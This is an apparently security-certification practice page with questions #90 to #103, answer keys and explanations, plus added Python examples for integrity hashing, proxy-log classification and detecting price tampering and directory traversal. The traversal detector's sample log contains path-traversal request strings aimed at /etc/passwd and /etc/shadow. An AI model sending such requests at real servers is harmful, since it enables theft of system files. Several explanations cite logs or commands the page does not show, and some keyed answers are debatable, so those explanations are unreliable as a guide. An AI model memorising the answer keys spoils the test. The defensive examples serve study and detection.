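As an added illustration (not part of the exam page or any vendor's code), the following Python sketch shows the kind of price-tampering weakness the question describes, the server-side validation that fixes it, and a simple dynamic probe that locates the weakness by replaying a tampered order. The catalog, SKU names and form fields are constructed assumptions.

```python
"""Added example: client-trusted price vs. server-side validation, plus a
dynamic probe that locates the weakness. Catalog and forms are constructed."""
from decimal import Decimal, InvalidOperation

# Constructed catalog: the server's authoritative prices (assumption).
CATALOG = {"SKU-100": Decimal("49.99"), "SKU-200": Decimal("199.00")}


class InvalidOrder(ValueError):
    """Raised by the hardened handler when a form fails validation."""


def vulnerable_order_total(form):
    """Insecure: charges whatever 'price' arrived in the form.
    Editing the hidden price field in the browser changes the charge."""
    return Decimal(form["price"]) * int(form["qty"])


def hardened_order_total(form):
    """Validates sku and qty, then prices from the catalog only.
    A client-supplied 'price' field is ignored entirely."""
    sku = form.get("sku", "")
    if sku not in CATALOG:
        raise InvalidOrder("unknown sku")
    qty_raw = form.get("qty", "")
    # isascii + isdigit rejects '', '-1', '2.5', '1e3' and non-ASCII digits
    if not (qty_raw.isascii() and qty_raw.isdigit()):
        raise InvalidOrder("qty must be a positive integer")
    qty = int(qty_raw)
    if not 1 <= qty <= 100:
        raise InvalidOrder("qty out of range")
    return CATALOG[sku] * qty


def is_rejected(handler, form):
    """True if the handler refuses the form instead of pricing it."""
    try:
        handler(form)
    except (InvalidOrder, KeyError, ValueError, InvalidOperation):
        return True
    return False


def probe_for_price_tampering(handler, form):
    """Dynamic test in the spirit of a DAST run: replay the same order with
    a tampered price and report whether the computed charge moved."""
    baseline = handler(form)
    tampered = dict(form, price="0.01")
    return handler(tampered) != baseline


if __name__ == "__main__":
    order = {"sku": "SKU-100", "qty": "2", "price": "49.99"}
    for name, handler in [("vulnerable", vulnerable_order_total),
                          ("hardened", hardened_order_total)]:
        print(name, "tamperable:", probe_for_price_tampering(handler, order))
```

The probe is the locating step: it needs no source access and reports a finding only where the application's behaviour actually changes. The hardened handler never reads the price from the request, so the probe reports nothing against it.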

Question #90

A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security analyst with finding the proper control functions to verify that a user’s data is not altered without the user’s consent.

Which of the following would be an appropriate course of action?

  • A . Automate the use of a hashing algorithm after verified users make changes to their data.
  • B . Use encryption first and then hash the data at regular, defined times.
  • C . Use a DLP product to monitor the data sets for unauthorized edits and changes.
  • D . Replicate the data sets at regular intervals and continuously compare the copies for unauthorized changes.

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

Automating the use of a hashing algorithm after verified users make changes to their data is an appropriate course of action to verify that a user’s data is not altered without the user’s consent. Hashing produces a fixed-length value for a given input, such as a file or a record, that changes whenever the input changes. Recording the hash each time a verified user changes their data, then recomputing and comparing it later, gives an integrity check: if the hash values match, the data has not been altered since the last consented change; if they differ, the data may have been tampered with or corrupted. A DLP product (option C) monitors sensitive data leaving the organization and is not an integrity control, and encrypting first and hashing on a schedule (option B) does not tie the baseline to the user's consented change.
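The same hash-and-compare technique serves both the forensic case in Question #86 (hashing every file on a cloned drive) and the integrity control here (re-hashing records after a consented change). The following Python block is an added example, not code from the exam page: it builds a per-file SHA-256 manifest, then re-verifies the tree and reports modified, missing and unexpected files. The sample files are constructed in a temporary directory.

```python
"""Added example: per-file SHA-256 manifest for integrity verification.
Sample files are constructed in a temporary directory."""
import hashlib
import os
import tempfile


def hash_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large evidence files fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/'-separated) to its digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def verify_manifest(root, manifest):
    """Re-hash the tree and report what changed since the manifest was taken."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest
                           if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "added": sorted(p for p in current if p not in manifest),
    }


def demo():
    """Take a baseline, then tamper with one file, delete another, add a third."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "logs"))
        for rel, data in [("invoice.txt", b"total=100"),
                          ("logs/auth.log", b"login ok")]:
            with open(os.path.join(root, rel), "wb") as handle:
                handle.write(data)
        baseline = build_manifest(root)          # the "original" hashes
        with open(os.path.join(root, "invoice.txt"), "wb") as handle:
            handle.write(b"total=1")             # unauthorised edit
        os.remove(os.path.join(root, "logs", "auth.log"))
        with open(os.path.join(root, "extra.bin"), "wb") as handle:
            handle.write(b"\x00")
        return verify_manifest(root, baseline)


if __name__ == "__main__":
    print(demo())
```

For evidence handling the manifest itself must be protected (signed, or stored write-once off the examined media); a hash list an attacker can rewrite proves nothing.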

Question #91

A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and running some sort of protection against malicious software.

Which of the following existing technical controls should a security analyst recommend to best meet all the requirements?

  • A . EDR
  • B . Port security
  • C . NAC
  • D . Segmentation

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

EDR stands for endpoint detection and response, which is a type of security solution that monitors and protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to ensure that all devices are patched and running some sort of protection against malicious software by providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can also help to enforce security policies and compliance requirements across all devices.

Reference: https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

Question #92

A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it.

Which of the following threats applies to this situation?

  • A . Potential data loss to external users
  • B . Loss of public/private key management
  • C . Cloud-based authentication attack
  • D . Identification and authentication failures

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

Potential data loss to external users is a threat that applies to this situation, where the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it. Data loss is an event that results in the destruction, corruption, or unauthorized disclosure of sensitive or confidential data. Data loss can occur due to various reasons, such as human error, hardware failure, malware infection, or cyberattack. In this case, hosting an accounts receivable form on a public document service exposes the data to potential data loss to external users who may access it without authorization or maliciously modify or delete it.

Question #93

A security analyst is supporting an embedded software team.

Which of the following is the best recommendation to ensure proper error handling at runtime?

  • A . Perform static code analysis.
  • B . Require application fuzzing.
  • C . Enforce input validation.
  • D . Perform a code review.

Reveal Solution Hide Solution

Correct Answer: D
D

Explanation:

Performing a code review is the best recommendation to ensure proper error handling at runtime for an embedded software team. A code review is a process of examining and evaluating source code by one or more developers other than the original author. A code review can help to identify and fix any errors, bugs, vulnerabilities, or inefficiencies in the code before it is deployed or executed. A code review can also help to ensure that the code follows the best practices, standards, and guidelines for error handling at runtime.

Question #94

The steering committee for information security management annually reviews the security incident register for the organization to look for trends and systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year.

Below is the incident register for the organization:

Which of the following should the organization consider investing in first due to the potential impact of availability?

  • A . Hire a managed service provider to help with vulnerability management.
  • B . Build a warm site in case of system outages.
  • C . Invest in a failover and redundant system, as necessary.
  • D . Hire additional staff for the IT department to assist with vulnerability management and log review.

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Investing in a failover and redundant system, as necessary, is the best solution to improve the availability of the organization’s systems based on past incidents. A failover system is a backup system that automatically takes over the operation of a primary system in case of a failure or outage. A redundant system is a duplicate system that runs simultaneously with the primary system and provides backup functionality if needed. Investing in a failover and redundant system can help to ensure that the organization’s systems are always available and can handle the workload without interruption or degradation.

Question #95

A cybersecurity analyst is concerned about attacks that use advanced evasion techniques.

Which of the following would best mitigate such attacks?

  • A . Keeping IPS rules up to date
  • B . Installing a proxy server
  • C . Applying network segmentation
  • D . Updating the antivirus software

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

Keeping IPS rules up to date is the best way to mitigate attacks that use advanced evasion techniques. An IPS (intrusion prevention system) is a security device that monitors network traffic and blocks or prevents malicious activity based on predefined rules or signatures. Advanced evasion techniques are cyberattacks that combine various evasion methods to bypass security detection and protection tools, such as IPS. Keeping IPS rules up to date can help to ensure that the IPS can recognize and block the latest advanced evasion techniques and prevent them from compromising the network.

Question #96

Legacy medical equipment, which contains sensitive data, cannot be patched.

Which of the following is the best solution to improve the equipment’s security posture?

  • A . Move the legacy systems behind a WAF.
  • B . Implement an air gap for the legacy systems.
  • C . Place the legacy systems in the perimeter network.
  • D . Implement a VPN between the legacy systems and the local network.

Reveal Solution Hide Solution

Correct Answer: B
B

Explanation:

Implementing an air gap for the legacy systems is the best solution to improve their security posture. An air gap is a physical separation of a system or network from any other system or network that may pose a threat. An air gap can prevent any unauthorized access or data transfer between the isolated system or network and the external environment. Implementing an air gap for the legacy systems can help to protect them from being exploited by attackers who may take advantage of their unpatched vulnerabilities.

Question #97

A security analyst notices the following proxy log entries:

Which of the following is the user attempting to do based on the log entries?

  • A . Use a DoS attack on external hosts.
  • B . Exfiltrate data.
  • C . Scan the network.
  • D . Relay email.

Reveal Solution Hide Solution

Correct Answer: D
D

Explanation:

Relaying email is what the user is attempting, based on the log entries. The telling detail is the destination service rather than the destination hosts: the client is using the proxy to open outbound connections to a series of external mail servers on the SMTP port (TCP 25). An internal host that pushes mail to many external servers through the proxy is acting as a mail relay, the classic signature of a compromised machine sending spam. A network scan would instead show one or a few targets being probed across many ports, data exfiltration would show large transfers to a small number of destinations, and a DoS attack would show a high request rate against a single target rather than a sequence of mail connections.
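The distinction drawn above (many hosts on one service port versus one host on many ports) is easy to turn into a log check. The Python block below is an added example, not the exam's log or any vendor's code: it parses proxy CONNECT entries in a constructed, squid-like layout (timestamp, client, status, method, target) and classifies each client by its fan-out. Thresholds are assumptions to be tuned per environment.

```python
"""Added example: classify proxy clients from CONNECT entries. Log lines are
constructed in a squid-like layout: timestamp client status method target."""
import re
from collections import defaultdict

SAMPLE_LOG = """\
1700000000.101 10.10.5.23 TCP_TUNNEL/200 CONNECT 203.0.113.10:25
1700000000.402 10.10.5.23 TCP_TUNNEL/200 CONNECT 203.0.113.11:25
1700000000.733 10.10.5.23 TCP_TUNNEL/200 CONNECT 198.51.100.7:25
1700000001.050 10.10.5.23 TCP_TUNNEL/200 CONNECT 192.0.2.44:25
1700000002.000 10.10.5.40 TCP_MISS/200 GET http://www.example.com/index.html
1700000002.300 10.10.5.40 TCP_TUNNEL/200 CONNECT www.example.com:443
1700000003.000 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:21
1700000003.010 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:22
1700000003.020 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:23
1700000003.030 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:25
1700000003.040 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:80
1700000003.050 10.10.5.77 TCP_DENIED/403 CONNECT 192.0.2.9:443
"""

CONNECT_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<status>\S+)\s+CONNECT\s+"
    r"(?P<host>[^:\s]+):(?P<port>\d{1,5})$"
)


def parse_connects(log_text):
    """Return (client, host, port) for each CONNECT entry. Other methods are
    ordinary proxied HTTP and are not tunnel attempts, so they are skipped."""
    events = []
    for line in log_text.splitlines():
        match = CONNECT_RE.match(line.strip())
        if match:
            events.append((match["client"], match["host"], int(match["port"])))
    return events


def classify_clients(events, relay_min_hosts=3, scan_min_ports=5):
    """Fan-out heuristics per client (thresholds are assumptions):
    many hosts, all on port 25 -> mail relay
    one host, many ports       -> port scan
    anything else              -> normal"""
    by_client = defaultdict(list)
    for client, host, port in events:
        by_client[client].append((host, port))
    verdicts = {}
    for client, pairs in by_client.items():
        hosts = {host for host, _ in pairs}
        ports = {port for _, port in pairs}
        if ports == {25} and len(hosts) >= relay_min_hosts:
            verdicts[client] = "mail relay"
        elif len(hosts) == 1 and len(ports) >= scan_min_ports:
            verdicts[client] = "port scan"
        else:
            verdicts[client] = "normal"
    return verdicts


def analyse(log_text=SAMPLE_LOG):
    return classify_clients(parse_connects(log_text))


if __name__ == "__main__":
    for client, verdict in sorted(analyse().items()):
        print(client, verdict)
```

Note that the relay client succeeds (TCP_TUNNEL/200) while the scanner is denied; a proxy that permits CONNECT to port 25 at all is the configuration weakness that makes relaying possible.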

Question #98

A company’s legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. The department has asked a security analyst to help tailor the response plan to provide broad coverage for many situations.

Which of the following is the best way to achieve this goal?

  • A . Focus on incidents that have a high chance of reputation harm.
  • B . Focus on common attack vectors first.
  • C . Focus on incidents that affect critical systems.
  • D . Focus on incidents that may require law enforcement support.

Reveal Solution Hide Solution

Correct Answer: B
B

Explanation:

Focusing on common attack vectors first is the best way to give the plan broad coverage. The legal department’s concern is that no plan can enumerate every possible incident, so the plan should be organized around the routes by which incidents actually arrive, such as phishing, credential theft, exploitation of public-facing services, malware, insider misuse and lost devices, with a playbook for each. Because most incidents, whatever their eventual impact, begin through one of a small number of vectors, this approach covers the largest share of real situations with the fewest scenarios. The other options each narrow the plan to one slice of incidents, by reputational harm, by affected system or by the need for law enforcement support, and leave the rest uncovered.

Question #99

During a company’s most recent incident, a vulnerability in custom software was exploited on an externally facing server by an APT.

The lessons-learned report noted the following:

• The development team used a new software language that was not supported by the security team’s automated assessment tools.

• During the deployment, the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced testing. Therefore, the vulnerability was not detected.

• The current IPS did not have effective signatures and policies in place to detect and prevent runtime attacks on the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST address these findings? (Choose two.)

  • A . Train the security assessment team to evaluate the new language and verify that best practices for secure coding have been followed
  • B . Work with the automated assessment-tool vendor to add support for the new language so these vulnerabilities are discovered automatically
  • C . Contact the human resources department to hire new security team members who are already familiar with the new language
  • D . Run the software on isolated systems so when they are compromised, the attacker cannot pivot to adjacent systems
  • E . Instruct only the development team to document the remediation steps for this vulnerability
  • F . Outsource development and hosting of the applications in the new language to a third-party vendor so the risk is transferred to that provider

Reveal Solution Hide Solution

Correct Answer: A, B
A, B

Explanation:

The solution will address the findings that the development team used a new software language that was not supported by the security team’s automated assessment tools and the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced testing. The training of the security assessment team and working with the automated assessment-tool vendor to add support for the new language will ensure that future deployments of the new technology are secure and the vulnerabilities are detected and prevented.

Question #100

Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

  • A . Password sniffing
  • B . ARP spoofing
  • C . A brute-force attack
  • D . An SQL injection

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

The Nmap command given in the question performs a TCP SYN scan (-sS), a service version detection scan (-sV), an OS detection scan (-O), and a port scan for ports 1-1024 (-p 1-1024) on the host 192.168.1.1. This command will reveal information about the host’s operating system, open ports, and running services, which can be used by an attacker to launch a brute-force attack against the host. A brute-force attack is a method of guessing passwords or encryption keys by trying many possible combinations until finding the correct one. An attacker can use the information from the Nmap scan to target specific services or protocols that may have weak or default credentials, such as FTP, SSH, Telnet, or HTTP.

Question #101

A security analyst is reviewing the following log entries to identify anomalous activity:

Which of the following attack types is occurring?

  • A . Directory traversal
  • B . SQL injection
  • C . Buffer overflow
  • D . Cross-site scripting

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

A directory traversal attack is a type of web application attack that exploits insufficient input validation or improper configuration to access files or directories outside the intended scope of the web server. The log entries given in the question show several requests that contain "../" sequences in the URL, each of which moves up one level in the directory structure. For example, the request "/images/../../etc/passwd" tries to climb out of the images directory and read the /etc/passwd file, which contains user account information on Linux systems. If successful, this attack could allow an attacker to read, modify, or execute files on the web server that are not meant to be accessible.
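Spotting the literal "../" is the easy case; attackers also send the sequence percent-encoded ("..%2f") or double-encoded ("%252e%252e"), and a dot-dot that stays inside the web root is not an escape. The Python block below is an added example, not code from the exam page: it decodes each request target (bounded), walks the path segments and flags only requests that climb above the root. The access-log lines are constructed.

```python
"""Added example: flag directory-traversal requests in access-log lines,
including URL-encoded and double-encoded forms. Log lines are constructed."""
import re
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /images/logo.png HTTP/1.1" 200 1532
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /images/../../etc/passwd HTTP/1.1" 403 0
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /images/..%2f..%2fetc%2fshadow HTTP/1.1" 403 0
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /static/%252e%252e/%252e%252e/win.ini HTTP/1.1" 404 0
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 88
198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /docs/../index.html HTTP/1.1" 200 512
"""

# Combined-log-format request line: client, then the quoted "METHOD target HTTP/x"
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def fully_decode(text, max_rounds=3):
    """Undo percent-encoding repeatedly (bounded) so %252e%252e becomes '..'."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def escapes_root(target):
    """True when the decoded path climbs above the web root. Dots inside a
    segment ('a..b') are not '..' segments and are not flagged, and a '..'
    that stays within the tree ('/docs/../index.html') is not an escape."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for segment in path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def scan_log(log_text):
    """Return (client, target) for every request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if match and escapes_root(match["target"]):
            hits.append((match["client"], match["target"]))
    return hits


if __name__ == "__main__":
    for client, target in scan_log(SAMPLE_ACCESS_LOG):
        print(client, target)
```

The 403 and 404 status codes in the constructed lines show the server refusing the requests; the same check run against a log where such requests returned 200 is the signal that the traversal succeeded.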

Question #102

A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device.

The security analyst then identifies the following additional details:

• Bursts of network utilization occur approximately every seven days.

• The content being transferred appears to be encrypted or obfuscated.

• A separate but persistent outbound TCP connection from the host to infrastructure in a third-party cloud is in place.

• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.

• Single file sizes are 10GB.

Which of the following describes the most likely cause of the issue?

  • A . Memory consumption
  • B . Non-standard port usage
  • C . Data exfiltration
  • D . System update
  • E . Botnet participant

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Data exfiltration is the unauthorized transfer of data from an organization’s network to an external destination, usually for malicious purposes such as espionage, sabotage, or theft. The details given in the question point to data exfiltration from the endpoint device. The bursts of network utilization every seven days indicate periodic data transfers. The content being transferred appears to be encrypted or obfuscated to avoid detection or analysis. The persistent outbound TCP connection from the host to infrastructure in a third-party cloud indicates a possible command-and-control channel. The HDD utilization growing by 10GB to 12GB every seven days, with single file sizes of 10GB, indicates that large amounts of data are being collected and packaged locally before being sent out on the same weekly cycle.

Question #103

A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The packet capture does not need to be in a format that is readable by humans, since it will be put into a binary file called "packetCapture." The capture must be as efficient as possible, and the analyst wants to minimize the likelihood that packets will be missed.

Which of the following commands will best accomplish the analyst’s objectives?

  • A . tcpdump -w packetCapture
  • B . tcpdump -a packetCapture
  • C . tcpdump -n packetCapture
  • D . nmap -v > packetCapture
  • E . nmap -oA > packetCapture

Reveal Solution Hide Solution

Correct Answer: A
A

Explanation:

The tcpdump command is a network packet analyzer tool that can capture and display network traffic. The -w option specifies a file name to write the captured packets to, in a binary format that can be read by tcpdump or other tools later. This option is useful for capturing large amounts of network data that will be analyzed at a later time, as the question requires. The packet capture does not need to be in a format that is readable by humans, since it will be put into a binary file called “packetCapture”. The capture must be as efficient as possible, and the -w option minimizes the processing and output overhead of tcpdump, reducing the likelihood that packets will be missed.
